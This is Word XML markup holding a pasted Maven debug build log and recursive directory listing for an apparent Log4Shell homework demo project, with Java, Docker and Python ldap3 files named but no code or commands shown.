    <w:p w14:paraId="4181E2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com.google.guava:guava:jar:28.2-android:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED36D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com.google.guava:failureaccess:jar:1.0.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000A833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com.google.guava:listenablefuture:jar:9999.0-empty-to-avoid-conflict-with-guava:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E583DA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org.checkerframework:checker-compat-qual:jar:2.5.5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4303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com.google.errorprone:error_prone_annotations:jar:2.3.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E0507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com.google.j2objc:j2objc-annotations:jar:1.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037CCB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org.apache.commons:commons-lang3:jar:3.7:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AA77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Created new class realm plugin&gt;org.springframework.boot:spring-boot-maven-plugin:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A665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Importing foreign packages into class realm plugin&gt;org.springframework.boot:spring-boot-maven-plugin:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25946E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Imported:  &lt; maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A66E9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Populating class realm plugin&gt;org.springframework.boot:spring-boot-maven-plugin:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69210FE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org.springframework.boot:spring-boot-maven-plugin:jar:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346B3B5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org.springframework.boot:spring-boot-buildpack-platform:jar:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D0B4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com.fasterxml.jackson.core:jackson-databind:jar:2.12.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B8C72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com.fasterxml.jackson.core:jackson-annotations:jar:2.12.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BCF6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com.fasterxml.jackson.core:jackson-core:jar:2.12.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2451924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com.fasterxml.jackson.module:jackson-module-parameter-names:jar:2.12.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6864EE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net.java.dev.jna:jna-platform:jar:5.7.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03236B9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net.java.dev.jna:jna:jar:5.7.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E400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org.apache.commons:commons-compress:jar:1.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EDB3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org.apache.httpcomponents:httpclient:jar:4.5.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1467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org.apache.httpcomponents:httpcore:jar:4.4.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D20D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commons-logging:commons-logging:jar:1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6A6B4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commons-codec:commons-codec:jar:1.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A2E2D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org.springframework:spring-core:jar:5.3.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E4BC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org.springframework:spring-jcl:jar:5.3.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2FB43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org.tomlj:tomlj:jar:1.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6422B5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org.antlr:antlr4-runtime:jar:4.7.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A9DA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com.google.code.findbugs:jsr305:jar:3.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693FA44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org.springframework.boot:spring-boot-loader-tools:jar:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498E72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org.apache.maven.shared:maven-common-artifact-filters:jar:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CEDE2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org.codehaus.plexus:plexus-interpolation:jar:1.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332E3D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org.codehaus.plexus:plexus-component-annotations:jar:1.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFD8A3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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAC61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org.sonatype.plexus:plexus-cipher:jar:1.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1DDA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commons-io:commons-io:jar:2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305FF9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org.eclipse.aether:aether-util:jar:0.9.0.M2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE587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javax.enterprise:cdi-api:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8E5C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javax.annotation:jsr250-api:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8370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Included: org.sonatype.sisu:sisu-guice:jar:no_aop:3.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19769E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aopalliance:aopalliance:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BA87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org.eclipse.sisu:org.eclipse.sisu.inject:jar:0.0.0.M5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFC015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org.apache.maven.shared:maven-shared-utils:jar:3.3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACCDD7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org.codehaus.plexus:plexus-utils:jar:3.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405A18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org.sonatype.plexus:plexus-build-api:jar:0.0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5B2B1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org.apache.maven.plugins:maven-shade-plugin:jar:3.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5390A0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org.apache.maven.shared:maven-artifact-transfer:jar:0.12.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E726F6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org.ow2.asm:asm:jar:8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3727F9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org.ow2.asm:asm-commons:jar:8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A77A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org.ow2.asm:asm-tree:jar:8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B04139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org.ow2.asm:asm-analysis:jar:8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06710B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org.jdom:jdom2:jar:2.0.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C6D6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org.apache.maven.shared:maven-dependency-tree:jar:3.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2B50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org.vafer:jdependency:jar:2.4.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B4DE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org.ow2.asm:asm-util:jar:8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D1ABA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com.google.guava:guava:jar:28.2-android</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB44D2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com.google.guava:failureaccess:jar:1.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0110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com.google.guava:listenablefuture:jar:9999.0-empty-to-avoid-conflict-with-guava</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D00F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org.checkerframework:checker-compat-qual:jar:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DEE01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com.google.errorprone:error_prone_annotations:jar:2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4673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com.google.j2objc:j2objc-annotations:jar:1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDBC6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Included: org.apache.commons:commons-lang3:jar:3.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26640BD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org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage from plugin realm ClassRealm[plugin&gt;org.springframework.boot:spring-boot-maven-plugin:2.5.5, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67260B8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Configuring mojo 'org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3994C8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attach = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE858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excludeDevtools = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B928C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[DEBUG]   (f) excludes = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003343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executable = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BE80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finalName = log4shell-demo-0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5374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includeSystemScope = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BB8CF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includes = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1A9F2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mainClass = com.example.log4shell.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E58EF2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outputDirectory = /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DB0C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project = MavenProject: com.example:log4shell-demo:0.0.1-SNAPSHOT @ /home/ec2-user/log4shell-homework/pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6281FF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session = org.apache.maven.execution.MavenSession@2dddc1b9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302429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(f) skip = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76473E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[DEBUG] -- end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264898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Replacing main artifact with repackaged archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A17D4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0F340D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 SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AED4BF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5C87CB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Total time:  3.443 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60998A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Finished at: 2025-05-29T00:37:16Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D63A1B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723F2F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ls -R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D04F21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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C7FA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Dockerfile  SRC  docker-compose.yml  ldap_test.py  pom.xml  target  venv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD8555F" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="194FFB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./SRC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6F22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main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E81F486" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A8E9B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./SRC/main:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF0BA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java  resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2E6B2F" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D298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./SRC/main/java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523544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com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608F0CCC" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AEAC9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./SRC/main/java/com:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5323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example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C841CCB" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="635150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./SRC/main/java/com/example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419171F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log4shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CCE3A6" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66461A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./SRC/main/java/com/example/log4shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74112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Log4ShellDemoApplication.java  LogController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C388F2" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05697C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./SRC/main/resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACA3F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application.properties  log4j2.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF1B283" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="025A36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./target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DEA1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log4shell-demo-0.0.1-SNAPSHOT.jar  log4shell-demo-0.0.1-SNAPSHOT.jar.original  maven-archiver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEFAD9F" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21E4951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./target/maven-archiver:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59375A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pom.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9DC2B0" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E42A3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9086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bin  include  lib  lib64  pyvenv.cfg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8A1A85" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19282B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./venv/bin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350A1C3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Activate.ps1  activate  activate.csh  activate.fish  pip  pip3  pip3.9  python  python3  python3.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE89A41" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7972A59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./venv/include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E48C830" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0934A3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438416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python3.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6D58ED" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26F94A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B09D6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site-packages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4692C0D2" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06FC1A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1097FE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_distutils_hack           ldap3-2.9.1.dist-info  pkg_resources           setuptools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321B4D5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distutils-precedence.pth  pip                    pyasn1                  setuptools-59.6.0.dist-info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C72155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ldap3                     pip-21.3.1.dist-info   pyasn1-0.6.1.dist-info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA4AB5" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6300C4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./venv/lib/python3.9/site-packages/_distutils_hack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8E2F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override.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB0DA58" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B5582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./venv/lib/python3.9/site-packages/_distutils_hack/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7302D5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override.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB48FF1" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0002F5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C84BD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abstract  core  extend  operation  protocol  strategy  utils  version.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B61F9A5" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B31A9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./venv/lib/python3.9/site-packages/ldap3/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0FBF9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version.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7935C830" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F4DCC7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./venv/lib/python3.9/site-packages/ldap3/abstract:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A951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attrDef.py  attribute.py  cursor.py  entry.py  objectDef.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289895C1" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B5E2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./venv/lib/python3.9/site-packages/ldap3/abstract/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAC38D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attribute.cpython-39.pyc  entry.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560DB9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attrDef.cpython-39.pyc   cursor.cpython-39.pyc     objectDef.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6798BC72" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69824D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./venv/lib/python3.9/site-packages/ldap3/core:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EDFE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connection.py  pooling.py  results.py  timezone.py  usage.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33433A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exceptions.py  rdns.py     server.py   tls.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35378DF4" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F4DA1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./venv/lib/python3.9/site-packages/ldap3/core/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50491A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exceptions.cpython-39.pyc  rdns.cpython-39.pyc     server.cpython-39.pyc    tls.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A07B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connection.cpython-39.pyc  pooling.cpython-39.pyc     results.cpython-39.pyc  timezone.cpython-39.pyc  usage.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2787F0BF" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="252B985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./venv/lib/python3.9/site-packages/ldap3/extend:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148124D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microsoft  novell  operation.py  standard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396F2C04" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F85C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./venv/lib/python3.9/site-packages/ldap3/extend/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF283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operation.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749969E6" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C808B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./venv/lib/python3.9/site-packages/ldap3/extend/microsoft:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A86AD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addMembersToGroups.py  modifyPassword.py    removeMembersFromGroups.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAF13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dirSync.py             persistentSearch.py  unlockAccount.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568E17DC" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="243634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./venv/lib/python3.9/site-packages/ldap3/extend/microsoft/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8DD8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modifyPassword.cpython-39.pyc           unlockAccount.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C817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addMembersToGroups.cpython-39.pyc  persistentSearch.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413A58B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dirSync.cpython-39.pyc             removeMembersFromGroups.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7669A4A3" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
